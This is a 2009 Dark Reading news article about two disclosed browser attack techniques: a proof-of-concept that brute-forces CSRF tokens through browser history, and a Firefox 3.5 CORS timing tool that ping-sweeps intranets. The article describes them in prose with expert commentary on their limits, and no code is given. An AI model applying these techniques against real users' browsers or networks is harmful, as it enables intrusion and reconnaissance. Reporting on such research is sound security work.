Dark Reading is part of the Informa Tech Division of Informa PLC

This site is operated by a business or businesses owned by Informa PLC and all copyright resides with them.Informa PLC's registered office is 5 Howick Place, London SW1P 1WG. Registered in England and Wales. Number 8860726.

Endpoint

7/20/2009
03:53 PM
Connect Directly
Google+
Twitter
RSS
E-Mail
50%
50%

Two Newly Disclosed Hacks Prey On Browser, Web Security

New cross-site request forgery (CSRF) proof-of-concept and Firefox 3.5 hacking tool released

Browser security is still a work in progress, and a pair of new attacks is putting more pressure on already-strained defenses: one hacks protections against cross-site request forgery (CSRF), and another pokes holes in a new browser feature in order to break into intranets.

Researchers Inferno and RSnake separately released their work -- Inferno, a proof-of-concept for finding CSRF defense "tokens" by launching a silent brute-force attack on a client's browser, and RSnake (a.k.a. Robert Hansen), CEO of SecTheory, a new tool that goes after Firefox 3.5's new feature for mashups within Web applications.

Inferno posted a proof-of-concept over the weekend that demonstrates how to grab a CSRF token -- basically a security feature assigned to a user that protects against CSRF attacks -- from a user to wage a CSRF attack. His method goes after the client, based on the so-called XSS History Hack that researcher and WhiteHat Security CTO Jeremiah Grossman revealed three years ago.

"Uptil now, it was considered infeasible for an attacker to discover your CSRF token using Brute Force Attacks on the server," Inferno blogged, mainly because such an attack would be noisy and therefore easily detectable by an intrusion-detection system (IDS) or Web application firewall (WAF). "Many applications are programmed to invalidate your session after it detects more than a certain number of requests with invalid token values."

Inferno's client-side attack generates very little traffic, however, so it goes unnoticed by the IDS and WAF, he says. It brute-force hacks sets of URLs in the browser's history to find the user's CSRF token. Once the attacker has the token, he can bypass CSRF protections.

But "unless I, as an attacker, have your session ID [cookie], I can't figure out what your token is," WhiteHat's Grossman says. "And if I do get your session ID...then, well, you've got bigger problems."

CSRF attacks have been relatively rare, mainly because XSS bugs are so prevalent in Web applications and XSS bugs can be used to get past CSRF defenses, anyway, Grossman says. "So when XSS goes away, these [CSRF] attacks will become more common," he says. "If you can't find an XSS [flaw] on the target Website, this technique is something to put in the toolbox."

But Michael Sutton, vice president of security research at Zscaler, notes this new CSRF hack has its limitations -- namely the number of characters in the token. "While the technique has some value for an attacker, it would have limited application given the restriction that the token be no more than five characters and be included in the URI [uniform resource identifier]," he says. "It is common for such tokens to have a greater length and be passed in cookies or hidden form fields."

RSnake, meanwhile, has built a tool that pokes a hole in Firefox 3.5's cross-origin resource sharing (CORS) feature, which lets your server call other servers for mashing up content, for instance. Mozilla has built defenses into CORS to prevent abuse, such as an opt-in measure, but RSnake says he found a way to work around those defenses. "The server that is going to have information pulled from it has some information that tells the browser it's OK to pull this information and return it to the browser's [domain]," he says.

The XMLHttpRequest ping-sweeping tool can basically point the user's browser back at his or her internal network. The attacker can tell if an intranet site is behind the browser given the time it takes the site to respond, or not. "If I can tell the difference between the time that a page can be contacted and the time a browser times out because the connection can't be reached, it turns into an internal 'ping,'" RSnake says. "And it lets the browser see what machines are live and not live.

"By getting them to visit a page that's under my control -- via XSS or otherwise -- I can get the user to perform this pseudo ping-sweep. That would enable me to see the layout of the inside of someone's home or office network if they were running Firefox 3.5 or higher with JavaScript enabled globally."

But this is only a first step in an intranet attack, RSnake says. "All I can see is a server sitting there " I can't see the pages," he says. "But I now know which servers are there and can do a targeted attack on those IP addresses using the cross-domain address."

"CORS could make JavaScript intranet hacking -- an issue that is still unaddressed by browser vendors -- more stealthy," WhiteHat's Grossman adds.

Zscaler's Sutton, meanwhile, says this is yet another port-scanning method for an attacker. "There are other hacks which can permit intranet port scanning, such as those using XSS," Zscaler's Sutton says. "This is yet another port-scanning technique for an attacker to add to their toolkit -- although it is fairly limited in scope at this point being restricted to Firefox 3.5."

RSnake says he didn't test the attack on Internet Explorer 8.0's similar feature, XDomainRequest. Have a comment on this story? Please click "Discuss" below. If you'd like to contact Dark Reading's editors directly, send us a message. Kelly Jackson Higgins is Executive Editor at DarkReading.com. She is an award-winning veteran technology and business journalist with more than two decades of experience in reporting and editing for various publications, including Network Computing, Secure Enterprise ... View Full Bio

Comment  | 
Print  | 
More Insights
Comments
Newest First  |  Oldest First  |  Threaded View
Aviation Faces Increasing Cybersecurity Scrutiny
Kelly Jackson Higgins, Executive Editor at Dark Reading,  8/22/2019
Microsoft Tops Phishers' Favorite Brands as Facebook Spikes
Kelly Sheridan, Staff Editor, Dark Reading,  8/22/2019
MoviePass Leaves Credit Card Numbers, Personal Data Exposed Online
Kelly Sheridan, Staff Editor, Dark Reading,  8/21/2019
Register for Dark Reading Newsletters
White Papers
Video
Cartoon
Current Issue
7 Threats & Disruptive Forces Changing the Face of Cybersecurity
This Dark Reading Tech Digest gives an in-depth look at the biggest emerging threats and disruptive forces that are changing the face of cybersecurity today.
Flash Poll
The State of IT Operations and Cybersecurity Operations
The State of IT Operations and Cybersecurity Operations
Your enterprise's cyber risk may depend upon the relationship between the IT team and the security team. Heres some insight on what's working and what isn't in the data center.
Twitter Feed
Dark Reading - Bug Report
Bug Report
Enterprise Vulnerabilities
From DHS/US-CERT's National Vulnerability Database
CVE-2016-6154
PUBLISHED: 2019-08-23
The authentication applet in Watchguard Fireware 11.11 Operating System has reflected XSS (this can also cause an open redirect).
CVE-2019-5594
PUBLISHED: 2019-08-23
An Improper Neutralization of Input During Web Page Generation ("Cross-site Scripting") in Fortinet FortiNAC 8.3.0 to 8.3.6 and 8.5.0 admin webUI may allow an unauthenticated attacker to perform a reflected XSS attack via the search field in the webUI.
CVE-2019-6695
PUBLISHED: 2019-08-23
Lack of root file system integrity checking in Fortinet FortiManager VM application images of all versions below 6.2.1 may allow an attacker to implant third-party programs by recreating the image through specific methods.
CVE-2019-12400
PUBLISHED: 2019-08-23
In version 2.0.3 Apache Santuario XML Security for Java, a caching mechanism was introduced to speed up creating new XML documents using a static pool of DocumentBuilders. However, if some untrusted code can register a malicious implementation with the thread context class loader first, then this im...
CVE-2019-15092
PUBLISHED: 2019-08-23
The webtoffee "WordPress Users & WooCommerce Customers Import Export" plugin 1.3.0 for WordPress allows CSV injection in the user_url, display_name, first_name, and last_name columns in an exported CSV file created by the WF_CustomerImpExpCsv_Exporter class.